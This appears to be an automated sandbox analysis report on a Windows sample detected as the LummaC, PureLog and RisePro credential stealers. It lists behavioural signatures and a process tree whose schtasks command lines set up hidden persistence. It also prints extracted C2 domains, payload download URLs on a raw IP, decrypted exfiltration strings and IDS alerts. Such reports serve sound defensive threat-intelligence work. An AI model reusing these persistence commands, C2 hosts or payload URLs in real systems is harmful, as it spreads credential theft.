Edit tour

Windows Analysis Report
OJa1BOigU3.exe

Overview

General Information

Sample name:	OJa1BOigU3.exe renamed because original name is a hash value
Original sample name:	5158fed3ee415791bb7a7a3712373383.exe
Analysis ID:	1436604
MD5:	5158fed3ee415791bb7a7a3712373383
SHA1:	b21e19150dd6df55b4578849fc4b6266e5b90829
SHA256:	e3eea6ef7ef2314970047b0a887c67d780eed12d40d5931e0a3e72061de5e746
Tags:	32exeRiseProStealertrojan
Infos:

Detection

LummaC, PureLog Stealer, RisePro Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected RisePro Stealer

.NET source code contains method to dynamically call methods (often used by packers)

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Creates multiple autostart registry keys

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

OJa1BOigU3.exe (PID: 1804 cmdline: "C:\Users\user\Desktop\OJa1BOigU3.exe" MD5: 5158FED3EE415791BB7A7A3712373383)

schtasks.exe (PID: 5444 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7048 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

3Q7v9y6Zw0a51Z43zHih.exe (PID: 3336 cmdline: "C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe" MD5: 5158FED3EE415791BB7A7A3712373383)

schtasks.exe (PID: 1712 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3332 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

U8cABsPhZFkKRrQ4rE0N.exe (PID: 3104 cmdline: "C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe" MD5: 46C72D686C836F3C97CE18B81B0D9864)

RegAsm.exe (PID: 1516 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 5064 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

schtasks.exe (PID: 2588 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1904 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

v6ggwc2fJXXgIu5fzDQ2.exe (PID: 5076 cmdline: "C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe" MD5: 3A2BDF3F22AF20AE6E0F2552C9301222)

RegAsm.exe (PID: 796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

schtasks.exe (PID: 4112 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH1\MPGPH1.exe" /tn "MPGPH1 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2164 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH1\MPGPH1.exe" /tn "MPGPH1 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 3408 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 276 MD5: C31336C1EFC2CCB44B4326EA793040F2)

MSIUpdaterV1.exe (PID: 5224 cmdline: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe MD5: 5158FED3EE415791BB7A7A3712373383)

MSIUpdaterV1.exe (PID: 5344 cmdline: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe MD5: 5158FED3EE415791BB7A7A3712373383)

MSIUpdaterV1.exe (PID: 4412 cmdline: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe MD5: 3A2BDF3F22AF20AE6E0F2552C9301222)

RegAsm.exe (PID: 6196 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6244 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 6468 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 288 MD5: C31336C1EFC2CCB44B4326EA793040F2)

AdobeUpdaterV1.exe (PID: 5568 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe" MD5: 5158FED3EE415791BB7A7A3712373383)

MSIUpdaterV1.exe (PID: 3248 cmdline: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe MD5: 3A2BDF3F22AF20AE6E0F2552C9301222)

RegAsm.exe (PID: 6172 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 248 MD5: C31336C1EFC2CCB44B4326EA793040F2)

MSIUpdaterV1.exe (PID: 5080 cmdline: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe MD5: 46C72D686C836F3C97CE18B81B0D9864)

RegAsm.exe (PID: 5856 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

MSIUpdaterV1.exe (PID: 944 cmdline: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe MD5: 46C72D686C836F3C97CE18B81B0D9864)

RegAsm.exe (PID: 5544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

MPGPH1.exe (PID: 6112 cmdline: C:\ProgramData\MPGPH1\MPGPH1.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 3444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MPGPH1.exe (PID: 5408 cmdline: C:\ProgramData\MPGPH1\MPGPH1.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AdobeUpdaterV1.exe (PID: 6692 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe" MD5: 46C72D686C836F3C97CE18B81B0D9864)

RegAsm.exe (PID: 6884 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "miniaturefinerninewjs.shop"], "Build id": "H8NgCl--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\RLhyDRs2UHaLI0bTHvNtryI.zip	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\lumma2804[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000028.00000002.2783994618.0000000001057000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2277600314.000000000637F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.2275260383.0000000006333000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.2278188796.00000000068DA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.2165765311.0000000005E90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
00000029.00000002.2784153638.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2275159782.0000000006301000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000000.2287643902.0000000000BB2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.2275215754.0000000005E61000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: OJa1BOigU3.exe PID: 1804	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 3Q7v9y6Zw0a51Z43zHih.exe PID: 3336	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: MSIUpdaterV1.exe PID: 5224	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: MSIUpdaterV1.exe PID: 5344	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5064	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AdobeUpdaterV1.exe PID: 5568	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 796	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5544	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5856	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6172	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6244	JoeSecurity_RiseProStealer	Yara detected RisePro Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author
15.0.U8cABsPhZFkKRrQ4rE0N.exe.bb0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.OJa1BOigU3.exe.637f940.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.OJa1BOigU3.exe.6333a00.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.OJa1BOigU3.exe.6339420.14.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.OJa1BOigU3.exe.637f940.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.OJa1BOigU3.exe.6333a00.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.OJa1BOigU3.exe.637f940.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.OJa1BOigU3.exe.637f940.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.OJa1BOigU3.exe.6333a00.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.OJa1BOigU3.exe.6333a00.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.OJa1BOigU3.exe.634bfa0.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 6 entries

Sigma Signatures

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\OJa1BOigU3.exe, ProcessId: 1804, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe

Snort Signatures

ET TROJAN RisePro TCP Heartbeat Packet - Source IP: 192.168.2.4 - Destination IP: 193.233.132.226

Timestamp:	05/06/24-07:47:00.337121
SID:	2049060
Source Port:	49739
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) - Source IP: 192.168.2.4 - Destination IP: 193.233.132.226

Timestamp:	05/06/24-07:48:32.668644
SID:	2046268
Source Port:	49739
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.4 - Destination IP: 193.233.132.226

Timestamp:	05/06/24-07:48:34.351264
SID:	2046269
Source Port:	49739
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 193.233.132.226 - Destination IP: 192.168.2.4

Timestamp:	05/06/24-07:47:00.569492
SID:	2046266
Source Port:	50500
Destination Port:	49739
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (External IP) - Source IP: 193.233.132.226 - Destination IP: 192.168.2.4

Timestamp:	05/06/24-07:48:31.228011
SID:	2046267
Source Port:	50500
Destination Port:	49739
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://193.233.132.253/lumma2804.exe

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Avira: detection malicious, Label: HEUR/AGEN.1323756
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\lumma2804[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1323756
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Avira: detection malicious, Label: HEUR/AGEN.1323756
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe	Avira: detection malicious, Label: HEUR/AGEN.1323756

Found malware configuration

Source: U8cABsPhZFkKRrQ4rE0N.exe.3104.15.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "miniaturefinerninewjs.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for domain / URL

Source: https://miniaturefinerninewjs.shop/api	Virustotal: Detection: 9%	Perma Link
Source: http://193.233.132.253/retailerTest.exe	Virustotal: Detection: 25%	Perma Link
Source: https://miniaturefinerninewjs.shop/apic	Virustotal: Detection: 8%	Perma Link
Source: sweetsquarediaslw.shop	Virustotal: Detection: 10%	Perma Link
Source: https://miniaturefinerninewjs.shop/apig	Virustotal: Detection: 7%	Perma Link
Source: http://193.233.132.253/lumma2804.exe	Virustotal: Detection: 25%	Perma Link
Source: https://miniaturefinerninewjs.shop:443/api	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	ReversingLabs: Detection: 62%
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Virustotal: Detection: 59%	Perma Link
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Virustotal: Detection: 30%	Perma Link
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	ReversingLabs: Detection: 44%
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Virustotal: Detection: 41%	Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe	Virustotal: Detection: 59%	Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Virustotal: Detection: 30%	Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Virustotal: Detection: 41%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer_prog[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer_prog[1].exe	Virustotal: Detection: 41%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\retailerTest[1].exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Source: OJa1BOigU3.exe	ReversingLabs: Detection: 44%
Source: OJa1BOigU3.exe	Virustotal: Detection: 41%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\retailerTest[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\lumma2804[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: boredimperissvieos.shop
Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: holicisticscrarws.shop
Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: sweetsquarediaslw.shop
Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: plaintediousidowsko.shop
Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: miniaturefinerninewjs.shop
Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: zippyfinickysofwps.shop
Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: obsceneclassyjuwks.shop
Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: acceptabledcooeprs.shop
Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: miniaturefinerninewjs.shop
Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 17_2_004168A5 CryptUnprotectData,

17_2_004168A5

Source: OJa1BOigU3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.191:443 -> 192.168.2.4:49745 version: TLS 1.2
